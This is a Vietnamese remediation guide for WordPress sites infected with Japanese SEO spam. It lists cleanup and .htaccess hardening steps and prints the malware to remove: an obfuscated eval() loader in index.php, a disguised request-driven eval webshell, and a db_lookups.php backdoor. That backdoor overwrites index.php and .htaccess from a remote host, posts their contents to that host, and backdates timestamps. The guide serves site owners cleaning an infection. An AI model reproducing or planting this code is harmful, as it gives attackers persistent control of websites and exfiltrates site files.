WordPress index tiếng Nhật

Cách FIX:

1, Vào https://www.google.com/webmasters/verification kiểm tra quyền truy cập WMT

2, Download Plugin Wordfence Security về để quét toàn bộ site: Link down đây

3, Vào File Manager xóa theo chỉ dẫn, Update các plugin nếu có

4, Kiểm tra các file so sánh với mã nguồn Wordpress : https://github.com/WordPress/WordPress

5, Xóa file có tên: comay.php; db_lookups.php

6, Vào htaccess xóa dòng: "RewriteRule ^ [a-zA-Z0-9] {3} ([a-zA-Z0-9] / $ index.php? tempweb = $ 1 & smid = $ 2 [L]"

7, Tăng cường bảo mật cho website như sau:

Tạo file .htaccess để ngăn các tập tin *.php truy cập trái phép bao gồm wp-includes, wp-content và wp-content/uploads

Với thư mục wp-includes, các bạn tạo file .htaccess với nội dung như sau:

<Files *.php>

deny from all

</Files>

<Files wp-tinymce.php>

allow from all

</Files>

<Files ms-files.php>

allow from all

</Files>

Options All -Indexes

Còn đây là nội dung của file .htaccess dành cho thư mục wp-content và thư mục wp-content/uploads:

<Files *.php>

deny from all

</Files>

Options All -Indexes

Chỉnh sửa tệp .htaccess và thêm một quy tắc mới vào nó cho phép chỉ truy cập vào tệp XML-RPC từ Jetpack.

<FilesMatch "xmlrpc\.php$">

Allow from 192.0.82.250

Allow from 192.0.83.250

Deny from All

</FilesMatch>

8, Vào google webmaster tools thường xuyên đánh dấu các lỗi 404 là cố định

9, Một số code cần xóa:

File: index.php

<?php

@set_time_limit(3600);

@ignore_user_abort(1);

$xmlname = 'mapss259.xml';

$jdir = '';

$smuri_tmp = smrequest_uri();

if($smuri_tmp==''){

$smuri_tmp='/';

}

$smuri = base64_encode($smuri_tmp);

$dt = 0;

function smrequest_uri(){

if (isset($_SERVER['REQUEST_URI'])){        

$smuri = $_SERVER['REQUEST_URI'];        

}else{

if(isset($_SERVER['argv'])){       

$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];     

}else{      

$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];        

}

}        

return $smuri;        

}

$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iQkN3U2pIaG9yWlFlRkVpeVViTGNYVllmV3p1Skd2dGFOblJxeGxBTXBUSU9kbUtEUGdrc0tSSnBFRE1aeHpWRnNJdHZpam1mYnlndW5ZQ2VkQlRRWFBPb0xoY1VrU05ycWxXSGFHQXdhSDlKUURjR0hWWlhSRzBXZURPaGpiY0dhcEtjZXM5RE95T2plM1hUcWR5VGZScXFySjBXZWRxQnEyeXROSDBHZTI1a2pseTB6bnlDVXA1WWduaHhnbmh0Z2JYWlFwNUpxdmY3SFZaQVFuVkdhcEtjZXM5RE95T2plM1hUUW5WUGJTd0dIVlpBZjJoMHpwYzlOSWNBYjBxc3lzd1BmMjFZUWJPaGUxMDdIVlpBZjJoMHpwYzlORFgwZmg5dnpiS3dnblhoV1JmQmV2SlBldkpBZjJoMHpwQTdIVlpBUWQ5WXFSYzlOUk91aTB5cHlBeXBudnFOeXNPVmIwTWFpMVZQYlN3WFJ0T0VqZDlFUXZjOU5SZlBySjBXSFZaQXFkeVRmRHFoZ3RjOU5JY0FiMHFzeXN3UHFkeVRmRHFoZ3RxcXJKMFdlRE9oamJLM3puTkdhcEtZcURldWZseUpqZHNFenBHUG12ZndldmZ3ZURPaGpiSzN6bk5rckowV0hWa2t6dEdBcWR5VGZEcWhndGg3SFZaZWVEWGtxZGlHYXBjQXFkeVRmRHFoZ2h3SmJwNEFxZHlUZkRxaGdod0xicDRBcWR5VGZEcWhnaHd2YlN3WFJHQUFxZHlUZlJjOU5EWDFnUFgwZnRHQXFkeVRmRHFoZ3RKWVdTd1hSUDBYUkcwV0hWWkFqZHNDenZjOU5ST3VpMHlweUF5cG52ZU55c09WYjBzSFYweVZ5czlVVmk1RHlpc0RPcGVxckowV2VkTE1qbGZHYXBLdGdiWGhYRU91em41RWoyT2hXUk93Z241UFdTd1hSdE9CZnZjOU5ST3VpMHlweUF5cG52cU55c09WYjF5U095ZXVWaXFzU2hWUGJTd1hSdE9CZnZjOU5kZU1mMmkyWHM5aGpsWEJ6ZGlaZWQ5WVdTd1hSbGhsV2RoWWYyeTBXUk91aTB5cHlBeXBudnFOeXNPVmIxZXNPQXlwT3lOUGJwQWtGSjBXTlJjR05STzFmbExZUWRzQ3p2YzlOUk91aTB5cHlBeXBudnFOeXNPVmIxZXNPQXlwT3lOUGJTd1hSdGNHTlJjQXFiZXdmMk1NamxmR2FwS3RnYlhoWEVPdXpuNUVqMk9oV1JPMWZsTFlRZHNDenZBN0hWazl6bkxZemJ3WFJHQUFxYmV3ZjJNTWpsZkdhcGNQZVl3WFJQMFhSRzBXUW5nWnoyeTB6bjUyV1JxcE9pMWF5SXl1VmlPSWl0ZmtOUmdsTkRYMGZsWE1mMnlFamJjWnoyeTB6bjUyV1JxcE9pMWF5SXl1VmlPSWl0ZmttUmNQcW41eGpsOTNqdGZrV3BLN0hWWkFnMkxCZzJ3R2FwS1B6Yk9oalBnWmUxZXNTaTlpT3k5S09JT3BldkE3SFZrOU5keXdmMnlrenRNa2YzWGhxUkdBYjFYc2loenNpaHdQaUF5WFMxT3NiMHNJT3NOUGJwQUdldGdHZXM5U095ZW5PeWVqZTFlc1NpOWlPeTlLT0lPcGUxMEdldGdHZjNPdmcyc1l6blhUZlJHQWIxWHNpaHpzaWh3UGlBeVhTMU9zYjBzSU9zTlBicEpHZTN5Q1EyNUJxMjRQV3BBR0ZKMFdlZFh3ajJYeE5IMEdlczlTT3llbk95ZWplMWVzU2k5aU95OUtPSU9wZTEwN0hWazlIVlpYUnRPWnFET0piMlh3ajJYeE5IMEdldmY3SFZra3p0TVB6Yk9oalBnWmUwTWl5c0t1VjBMZU9pNWliMGhWZXZBR2V0Z0dmM092ZzJzWXpuWFRmUk1QemJPaGpQZ1plME1peXNLdVYwTGVPaTVpYjBoVmV2QXdOUnExamxUQ2ozcUNldkFrTkR3WFJ0T1pxRE9KYjJYd2oyWHhOSDBHejJ5MHpuNTJXUnFOeXNPVmIwWFVwaXlyeXM5ZWlSZmtySjBXdXBLaGpEWGhRbmdaejJ5MHpuNTJXUnFOeXNPVmIxTXVPQTlweTBzcE9JeUliMHphaXRma05SZ2xORFgwZmxYTWYyeUVqYmNaejJ5MHpuNTJXUnFOeXNPVmIxTXVPQTlweTBzcE9JeUliMHphaXRma21SY1BxbjV4amw5M2p0ZmtXcEs3SFZaQVFETzBmczlFamQ5RVF2YzlOZHFocWR5Q3F0R1Bwc09paXM5Z2IwemFpaHFLaUFPc09zOWRTMU5QV1N3WFJQMFhSRzBXUW5nWmYzT3ZRYlgwZnRHQWcyTEJnMnd3ZXZKUFdwaDdIVlplZWRYd2oyWHhiM09UZlJjOU5keTRmZExCemRpWk50SnRtUk9FamQ5RVF2QTdIVlplZWRYd2oyWHhOSDBHZWRYd2oyWHhiM09UZnN3SmJTd1hSUDBlSFZra3p0TWNlczlET3lPamUyVG9lMTBHYVMwR05FSXRXYndlSFZaZWVEeTFmbEpHYXBjQWIwcXN5c3dQUTJrWVFiT2hlMTA3UlYwV1JueUVRZDhHZVlMa3pQZU1qbmlHTmRoQWFwZVRnbmhDcTJ5dE50S0NnbjFoYXBlVGduaENxMnl0TnRLWnpuaFBRRFY5TkVJSlVSaXRORHFrekRPWmFwTkxVSGNoTnRLWXFEaHd6UzB0TmRPa2YzS3dnYkE2TmRld2oyWHhyMkxoelBWNlVIVDBqM2M2VUhUSmozWGtxZGhCakVrbFFiTWh6SHdHRnQxa2psT2hGSFpHVVNjSlVIY0pydmNHZ2xzRVEycXZqM3lDelIxRWoyTEJmRVpHTjJ6bHpFd3ROZHp2Z24xaGdsOXZ6ZHl2TkgwR05FY3ROUktsZmxzVHpuZUJmbE9oZkUwdFVSTkdOZDlDU2Q5TXpIMHRRaXp2Z24xaHBkeWt6Mk0wV1JBdE5EWHZnWTB0ZXY1dGdiWGhYRU91emR5RWoyT2hXUk8xcWJld1dwNFBORTQ4bTJobGZsc1R6UzRQckowV1JueTRRYlY3SFZrOUhWWlhSbGhsV0RYMGZsaFlxRE5aZURYVHFiZWtiM09UZlJKUG1sWFlmdmZrV2J3ZUhWWmVlRHFoZ3RjOU5ScVpxRE9KcnQ4QmV2NEF6Mjkzem5OQ2V2OWtqbE9oRlI1SlFEYy9xYmV3YXBmQ2VEWGtxZGlDZXZ6a3pIMFBtdE9relI0UGVQT2hqYmM5ZXY0QXFkeVRmUjRQZWxPMGFwZkNlZE8wbXRmbHEyeXRhcGZDZWRNQmYzVkNldno2RkUwUG1QWFRRYlh0ajNWWldwNFBlbGtBUWJOOWV2NEFRbE9rZnQ0UGVsWHdqMlh4YXBmQ2VkWHdqMlh4bXRmbHFiZWthcGZDZURYVHFiZWttdGZsamRzQ3pZMFBtdE93Z241UG10ZmxqM1U5ZXY0QWozVUNldnoxZmxMWVFkc0N6WTBQbXRPMWZsTFlRZHNDenY0UGVsTTBxREt1ZzJMQmcydzlldjRBUURPMGZzOUVqZDlFUVl3WFJHQUFRRE9UanM5RWoyNTB6bjUwTkgwR3FEZWtqcE1Zam45MXFkT0JXUk8zem5Oa1dTd2VIVlplUW5nWk5iWDBmUFgwZnRHQVFET1RqczlFajI1MHpuNTBtUnFDajJlQnFEeVl6YmVNejJ5Q3FSZmtXYndlSFZaZVJuaGxXRFgwZlBYMGZ0R0FRRE9UanM5RWoyNTB6bjUwbVJxQlEyTTBqbkxQemJPRWoyNTB6bjUwZXZBa0ZKMFdSVkFlVmRNaGduT2hmdEd0VjI5Q3FkeUNxUjEwRmJLaHJ0SzB6Yk0wbTJYWWZZd0dnMk1NZlBYaHFIMTFxZGdUclJOa3JKMFdSVkFlZWRNMGpuTHVnMjlDcWR5Q3FSYzlORFgwZmg5dnpiS3dnblhoV1JlQlEyTTBqbkxQemJPRWoyNTB6bjUwTnRKUGV2SkFRRE9UanM5RWoyNTB6bjUwV1N3ZUhWWmVSVmhoZzJNQk5ST1pxZDF3YjJYQmpQT2hqUFY3UlZBZVJWMFdSVkFlemJNa3FSR2tySkFYUkdBZXVueXdmMmlHUW5nWmYzT3ZmM092V1JPWnFkMXdiMlhCalBPaGpQVndlMnFocWRYQmpQT2hqUFYxVUhLSmducWhldkFrRkowV1JWQWVWZE1oZ25PaGZ0R1Bwc09paVI4TG1FSUdYU2NKTkloQ3FkeXZqbHN3TnNYaGZQemhmdEtzZlBlQmZ0ZmtySjBXUlZBZXpiTWtxUkdrckowV1JWaDl6bkxZenBLa3p0TVlxRGVZcUROWmVkTTBqbkx1ZzI5Q3FkeUNxUkpQejJ5MGcyOUNxZHlDcUhWSlhES016MmlQV3BoN0hWWmVSVmhjUWR5TXpkeXZXUnFOeXNPVm1ZSUNVcGMwVUhWR1NsOTBOSXpCcW41QWV2QTdIVlplUlZoaEZkaDBXUkE3SFZaZVJiMFhSR0FlUlZBZVJWMFdSYjBlUlYwV3VWMFdIVmtoakRYaE5kaGxXUk9ZUWJPaFdid0dIVlplUW5nWmVEWGtxZGlHYVMwR2UzTVRqUmZrRkowV1JWaGNRZHlNemR5dldSZUhqMjUwem41MG1iTzVmZGk2TkRPaEZEVkJRRE9Uakh3R2cyTU1mUFhocUgxMXFkZ1RyUk5rckowV1JWQUFxMnl0TkgwR2UyTTBxRGM2bXY4UG10T1BqM3FoZ3Q0UG0zWGtxZHlUZ2JjQ2ZkTUphMk9NcWRpOWV2NEFRblZDZXZ6MHpuMUphcGZDZURPaGpiY0Nldnozem5OOWV2NEFRZDlZcVI0UGVQTVRqSDBQbXRPQXFId0dIVlplUm5obFdEWDFnUFgwZnRHQXFkeVRmUkpKbUhHa2FTMFBmMk1oamRMNGpuSlBXYndYUkdBZVJwTzRqbkxDZ24xaE5IMEdmM3l0ZjNPdldSTzB6bjFKbUhHa210ZkNGZDF3ZVl3WFJHQWV1VjBXUlZoa3p0TVlxbmVZcUROWmVET2hqYmN3VVJKM1dTMDllMk1NZzJUNGpuSlBXYndYUkdBZVJuaGxXRFgxZ1BYMGZ0R0FxZHlUZlJKM1dwaDdIVlplUlZBZWVETVRqZDVNam5pR2FwS1lxbmVZcUROWmVET2hqYmN3WHZBQ2V2NTRqbkpQckowV1JWQWV1VkFlUlYwV1JWaDlIVlplUnBPNGpuSkdhcEswZmxoVFdEWFRqM3kwemQ4WmVEcWhndEFrcnZjWFJHQWVlZDE1emxod3pwYzlOZHpCZmR5Q1dSTzRqbkxDZ24xaG1SY3Rxdk5rcnZjWFJHQWV6UHF2UWJPaFdST1RGbnpramRpd05STzRqbkprckowV1JWaGxnMkxCZjJpWmVkMTV6bGh3enBBN05jMFdSVmhoZzJNQk5SZUJRWUx0ZkU1WnFET0pydDhCTnQ0QWIxWHNpaHpzaWh3UHBzT2lpczlOUzFYaWUxMENOdDh0bXRPNGpuTENnbjFocnZjWFJHQWV6blhaanZjdGFkZXZhdE5DZURxaGdFd1hSR0FlSFZaZVJueTRRYlZaV1N3WFJHaDlSVjBXUm5obFdST2t6Umg3SFZaZVJpS1p6bnNBemJOWk5BWEJqUE9oalBWVHFEaEp6U1pHcWR5NHFSOVpxZDF3cnZLRVFkc3ZmMnkwYWJ5MHp0MDROdEE3SFZaZVJwTzN6bk5HYXBjUFFETzBmSFpCbXZmQ2VkcUJxMnl0bXRmQlFuNUF6YkdDZmRNSmEzeXZqSDBQbXRPWVFiT2htdGZsUW5WOWV2NEFRblZDZXZ6MHpuMUphcGZDZURPaGpiY0NldnpBcUgwUG10T0FxUjRQZVBxaGdFMFBtdE9aajNYMG10ZmxGUFo5ZXY1WWpuaFlnbDkwV1JBQ2V2em96ZGh2YXBmQ2Vka0FRYk5DZXZ6RWpkOUVRWTBQbXRPRWpkOUVRdjRQZVB5dlFTMFBtdE9ZamJ5dlFwNFBlbExNamxmOWV2NEFqZHNDenY0UGVsOVlhcGZDZWQ5WW10ZmxxYmV3ZjJNTWpsZjlldjRBcWJld2YyTU1qbGZDZXZ6WnFET0piMlh3ajJYeGFwZkNlZE0wcURLdWcyTEJnMnc3SFZaZVJwT1pxZDF3YjJYQmpQT2hqUFZHYXBLMGZsaFRXRFhUajN5MHpkOFplRHFoZ3RBa3JKMFdSVmhrenRHTWYzT3ZmM092V1JPWnFkMXdiMlhCalBPaGpQVndlMjVCZ2w5MHFiWGhmbHNQem41MGV2QWtGSjBXUlZBZVFuZ1pmM092ZjNPdldST1pxZDF3YjJYQmpQT2hqUFZ3ZTI5eFFET1RqZHFocWRYQmpQT2hqUFZQV3BoN0hWWmVSVkFlZWRNMGpuTHVnMjlDcWR5Q3FSYzlORFgwZmg5dnpiS3dnblhoV1JlQlEyTTBqbkxQemJPRWoyNTB6bjUwTnRKUGV2SkFRRE9UanM5RWoyNTB6bjUwV1N3WFJHQWVSVmhoZzJNQk5ST1pxZDF3YjJYQmpQT2hqUFY3UlZBZUhWWmVSVkFlemJNa3FSR2tySjBXUlZBZXVueXdmMmlHUW5nWmYzT3ZmM092V1JPWnFkMXdiMlhCalBPaGpQVndlMnFocWRYQmpQT2hqUFYxVUhLSmducWhldkFrRkowV1JWQWVSaUtaem5zQXpiTlplME1peXNjQlVwNExOSGlKVVJLZWpQT2hmbDVNalJLU3piZTJ6Yk5HT2JldmozTlBXU3dYUkdBZVJWaGhGZGgwV1JBN0hWWmVSVmg5em5MWXpwS2t6dE1ZcURlWXFETlplZE0wam5MdWcyOUNxZHlDcVJKUHoyeTBnMjlDcWR5Q3FIVkpYREtNejJpUFdwaDdIVlplUlZBZVZkTWhnbk9oZnRHUHBzT2lpUjhMbUVJR1hIYzBOSTVCcVJLZGozeUN6UmZrckowV1JWQWVSbnk0UWJWWldTd1hSR0FlUmIwWFJHQWVSVkFlUlYwV1JWaDlIVlpldVYwV3VueXdmMnk3SFZaZUhWWmVlRHFoZ3RjOU5ScVpxRE9KcnQ4QmV2NEF6Mjkzem5OQ2V2OWtqbE9oRlI1SlFEYy9xYmV3YW5lQnFSemt6SDBQbXRPa3pSNFBlUE9oamJjOWV2NEFxZHlUZlI0UGVsTzBhcGZDZWRPMG10ZmxxMnl0YXBmQ2VkTUJmM1ZDZXZ6NkZFMFBtUFhUUWJYdGozVlpXcDRQZWxrQVFiTjlldjRBUWxPa2Z0NFBlbFh3ajJYeGFwZkNlZFh3ajJYeG10ZmxxYmVrYXBmQ2VEWFRxYmVrbXRmbGpkc0N6WTBQbXRPd2duNVBtdGZsajNVOWV2NEFqM1VDZXZ6MWZsTFlRZHNDelkwUG10TzFmbExZUWRzQ3p2NFBlbE0wcURLdWcyTEJnMnc5ZXY0QVFETzBmczlFamQ5RVFZd1hSR0FBUURPVGpzOUVqMjUwem41ME5IMEdxRGVranBNWWpuOTFxZE9CV1JPM3puTmtXU3dYUkdoa3p0R01mM092ZjNPdldST1pxZDF3YjJYQmpQT2hqUFZ3ZTI1QmdsOTBxYlhoZmxzUHpuNTBldkFrRkowV1JWaGNRZHlNemR5dldSZUhqMjUwem41MG1iTzVmZGk2TkRPaEZEVkJRRE9Uakh3R2cyTU1mUFhocUgxMXFkZ1RyUk5rckowV1JWaGt6dE1ZcURlWXFETlplZE0wam5MdWcyOUNxZHlDcVJKUGoyVFpxZDF3ejJ5MGcyOUNxZHlDcVJma1did1hSR0FlUnBPWnFkMXdiMlhCalBPaGpQVkdhcEtZcURldWZseUpqZHNFenBHdGoyVFpxZDF3ejJ5MGcyOUNxZHlDcVJOd2V2ZndlZE0wam5MdWcyOUNxZHlDcVJBN0hWWmVSVmhoZzJNQk5ST1pxZDF3YjJYQmpQT2hqUFY3UlZBZUhWWmVSVmhoRmRoMFdSQTdIVlplUmIxaGpEWGhOZGhsV0RYMGZQWDBmdEdBUURPVGpzOUVqMjUwem41MG1ScVB6Yk9FajI1MHpuNTBYU2NKZmRzUHpwZmtXYndYUkdBZVJpS1p6bnNBemJOWmUwTWl5c2NCVXA0TE5IaUpVUktlalBPaGZsNU1qUktTemJlMnpiTkdPYmV2ajNOUFdTd1hSR0FlUm55NFFiVlpXU3dYUkdBZXVueXdmMmlHUW5nWmYzT3ZmM092V1JPWnFkMXdiMlhCalBPaGpQVndlMnFocWRYQmpQT2hqUFYwVUhPSmducWhldkFrRkowV1JWQWVWZE1oZ25PaGZ0R1Bwc09paVI4TG1FSUdYSGMwTkk1QnFSS2RqM3lDelJma3JKMFdSVkFlemJNa3FSR2tySjBXUlZoOUhWWmVSVkFlUlYwV1JiMGVIVms5SFZaWFJsejFqbFgwUW45Q05EWFRRYlh0ajNWWldwSzdIVlplZWRzUHpuNTBOSDBHZjNPdnFkOXdqM3FoZnRHQWIxWHNpaHpzaWh3UHBzT2lpczl5aTB5cGIwc0RPaTVpZTEwa3JKMFdSbmhsTlJHQWducWhqUFZHTlMwR050TmtORHdYUkdBZWVEWEpRbk9oZmhYa3FkaUdhcEtNZlBlTUZwY1pOaE9oamxYaGpQT2lmbHMyem5MaGZ0TndOQXFCajJxd3puZUJxUk53TmwxWWpsZUJxUk53TmhYQmYyOVlmZGhBemJOeE50SnRpMjlQajNpR3EyeXRORFhKUW5PaGZ0TndObGhNYjJzdmcyTWtxbHl2TnRKdG5uc1pqMjhNTnNYd3FiZUpOdEp0bm45MXpkc0JWbDkwTnRKdG5uc1pqMjhHaTJMMWZQY3RtUmVYaTA1UmozVnRtUmVXZ2J6TU5STWF6UE9oanRLWWZkc1ROZGVCcVJBdG1SZVJnbmhJcXlYSlFuT2hmdE53Tmh6QlFuTE1OdEp0bm5zQ3pkeTROZGVCcVJOd05BZVNmZGhBemJOdG1SZTBxMmhFem5MaGZ0TndOaFhCejI5MU5zWEpRbk9oZnROd05oWEp6bnlBRnBLU2ZkaEF6Yk50bVJlRGoyOVBqZGlHVm5PU3puNVl6cE53TkFNaGZsaDBmbGg0TnRKdGlEaDBRZDlDbWJ5dmpkTGtndE53TkFzd3piTU1OUk1lVnBLS2ZsWFpRYnpoZnRBdG1SZUtmMnd0bVJlc0Zkc3RqM1Z0bVJlSHFiWDBqdk53TkE5MXFkekJGSWVCcVI5emoyT01qMGVCcVJOd05QaE1nM0F0bVJlU3FiZTJ6YmhSajNWdG1SZXd6bnFZTnRKdGpEcUptYk92UWJ6a2duSnRtUmVycWJPRVFSTndOaFgwZ25YeGlsc1RnbExoZnROd05oT1p6cEszem5OR2diZUVRZGgyenBjWnBpSUdWYmVFUWRoMnpiTmtOdEp0aWR5dmpSSzBqMjl3TnRKdFNpWkxVbGVCcVJOd05BNWhxZFh2Z256ME50SnRTeVhlT2lYdmdicXd6Yk50bVJlYk8yeTBORE9CajJMWU50SnRqZHN2Z2xoQ050SnRPbGhZUVJLWXpuc3ZnMkd0bVJjUGdsaEN6MmVCcVJmd2UycUJqMnF3enBmd05ScXRnbmhBcXBmd05ScU1qMkpQbVJjUGdsaEN6dmZ3TlJxNWduTUJqdmZ3TlJxemduNUF6Yk1SajNWUG1SY1BWbk12em56WVZsOTBldkE3SFZaZVJuekJmbHlNZzJHR1dST1lmZGhBemJlU1FiT2hOZHNZTlJPMmduSmtORHdYUkdBZVJwT1lxRE5HYXBLWXFEZTBqMkxCcTJ5dldSTzJnbkprckowV1JWQWVRbmdHV0RYMGZQS0JmdkdBZ25xaGpQVndOUk9ZcUROa1dwSzdIVlplUlZBZWZseTBxYmVDTkRPdnFuaTdIVlplUlZoOUhWWmVSYjBYUkdoOXpuTFl6YndYUkdBZWZseTBxYmVDTmR6TWpEWGhySjBXUmIwWFJQMFhSbHoxamxYMFFuOUNORFhUajN5MHpkOFplRHl2alJoN0hWWmVlZHpramR5dWcyOUNxZHlDcURVR2FwS2N6bGh3enk5UHpiT3VnMjlDcWR5Q3FEVVplRHl2alJBN05jMFdSbmhsTlJHTWVkemtqZHl1ZzI5Q3FkeUNxRFVrTkR3WFJHQWVlZFhaTkgwR2czeXZqczlramxoMFdSQTdIVlplUm5YMWZsTHVmMnkwajNLMFdST0VRUkpHVjF5cFNJOVZ5czl5aUFKd05STzFmbEprckowV1JWaEVxYmV3YjNYaHFkOUpxUkdBZzJHd05JWHlpQUxhaXNPdWlBeWl5eWVyeXNlS1NoWGRPeU53VXBBN0hWWmVScE9sUW5MaGIyWEJqUE9oalBPWU5IMEdnM3l2anM5aEZkeUVXUk9FUVJBN0hWWmVSblgxZmxMdWcyTEJmMmlaZWRYWldTd1hSR2g5TmMwV1JiZWhxRHl2anRjQXpsaHd6eTlFajI1MHpuNTBmWXdYUlAwWFJFOCsiO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));

 ?>

File htaccess

RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).xhtml$ index.php?tempweb=$1&smid=$2 [L]

File:

<?php

/**

 * @package     wordpresss

 * @subpackage  Template.system

 *

 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.

 * @license     GNU General Public License version 2 or later; see LICENSE.txt

 */

$p = getcwd();

echo $p;

?>

<?php

$uf="aXRvbmd0b"; 

$ka="ZXZhbCgkX1"; 

$pjt="JFUVVFU1Rb"; 

$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); 

$iqw="25nXSk7"; 

$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); 

$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); 

$mpy = $sbp('', $bkf($vbl("W", "", $ka.$pjt.$uf.$iqw))); $mpy(); 

?>

Code có dạng:

<?php @eval(

DB_Lookup:

<?php 

$idruri = $_SERVER['REQUEST_URI'];

$dandir = getcwd();

$idruri = substr($idruri,0,strrpos($idruri,"/")); 

$idruri = str_replace("/",DIRECTORY_SEPARATOR,$idruri);

$gml = str_replace($idruri,"",$dandir); 

$dir = getcwd(); 

$web = str_replace('www.','',$_SERVER['HTTP_HOST']); 

$dirg = $dir.DIRECTORY_SEPARATOR;

chmod($gml.DIRECTORY_SEPARATOR.'index.php', 0644); 

$myfile = fopen($gml.DIRECTORY_SEPARATOR.'index.php', "r");  

$idbody = fread($myfile,filesize($gml.DIRECTORY_SEPARATOR.'index.php'));  

fclose($myfile);

chmod($gml.DIRECTORY_SEPARATOR.'.htaccess', 0644); 

$myfile = fopen($gml.DIRECTORY_SEPARATOR.'.htaccess', "r"); 

$hbody = fread($myfile,filesize($gml.DIRECTORY_SEPARATOR.'.htaccess')); 

fclose($myfile);

$bmail = @$_GET['m'];

$localhost_web = @$_GET['web'];

if(@$_GET['u']=='i'){ 

$webindex = 'http://'.$localhost_web.'/'.$bmail.'/'.$web.'/index.txt'; 

$bodyindex = gotfile($webindex); 

if(stristr($bodyindex,'<title>404 Not Found</title>')){

echo "404in";  exit;

}

if($bodyindex == ""){

echo "no index html"; exit; 

}else{

if(@$_GET['k'] == "r"){

rwfile($gml.DIRECTORY_SEPARATOR.'index.php',$bodyindex);

}else{

wfile($gml.DIRECTORY_SEPARATOR.'index.php',$bodyinde

} 

}

echo "ok go";

}else if(@$_GET['u']=='h'){  

$webh = 'http://www.'.$localhost_web.'/'.$bmail.'/'.$web.'/h.txt';

$bodyh = gotfile($webh);

if(stristr($bodyh,'<title>404 Not Found</title>')){

echo "404in"; exit;

}

if($bodyh == ""){

echo "no h html<br>";  

}else{

if(@$_GET['k'] == "r"){

rwfile($gml.DIRECTORY_SEPARATOR.'.htaccess',$bodyh);

}else{

wfile($gml.DIRECTORY_SEPARATOR.'.htaccess',$bodyh);

} 

}

echo "ok go";

} else if(@$_GET['u']=='d'){ 

$beiurl = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

$data  = array('zm1' => json_encode($idbody),'zm2' => json_encode($hbody),'zm3'=>json_encode($web),'zm4'=>json_encode($beiurl)); 

$ch = curl_init ();

curl_setopt ( $ch, CURLOPT_URL, "http://www.".$localhost_web."/post.php?m=".$bmail );

curl_setopt ( $ch, CURLOPT_POST, 1 );

curl_setopt ( $ch, CURLOPT_HEADER, 0 );

curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );

curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );

$date = curl_exec($ch);

curl_close ($ch);

echo $date;

}else if(@$_GET['u']=='q'){ 

echo '<textarea style=" width:800px;height: 100px;">'.$hbody.'</textarea><br><br>';

echo '<textarea style=" width:800px;height: 300px;">'.$idbody.'</textarea>';

}else if(@$_GET['u']=='m'){ 

$mm = 'http://'.$localhost_web.'/m.txt'; 

$mindex = gotfile($mm); 

wfile($gml.DIRECTORY_SEPARATOR.'m.php',$mindex);

echo "ok go";

}else{

echo 'ok';

}

function rwfile($dir,$body){ 

unlink($dir);

$fp = fopen($dir, "w+"); 

fwrite($fp,$body);

}

function wfile($dir,$body){

$fp = fopen($dir, "w+"); 

fwrite($fp,$body);

}

function gotfile($url){

$file_contents = @file_get_contents($url); 

if (!$file_contents) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);

$file_contents = curl_exec($ch);

curl_close($ch);

} 

return $file_contents; 

}

@touch("db_lookups.php",mktime(rand(1,23),rand(1,59),rand(1,59),rand(1,12),rand(1,29),rand(2008,2011))); 

@touch(($gml.DIRECTORY_SEPARATOR.'index.php'),mktime(rand(1,23),rand(1,59),rand(1,59),rand(1,12),rand(1,29),rand(2008,2011))); 

@touch(($gml.DIRECTORY_SEPARATOR.'.htaccess'),mktime(rand(1,23),rand(1,59),rand(1,59),rand(1,12),rand(1,29),rand(2008,2011))); 

?>

Cách kiểm tra website đã fix xong chưa 

Do cache nên sau khi fix sẽ phải chờ 1 khoảng time dài để biết website đã fix hết link. Có thể kiểm tra nhanh bằng các cách sau:

- Thứ hạng từ khóa trở lại

- Gõ cú pháp site:domain japan. VD Site:dongphuc4mua.com japan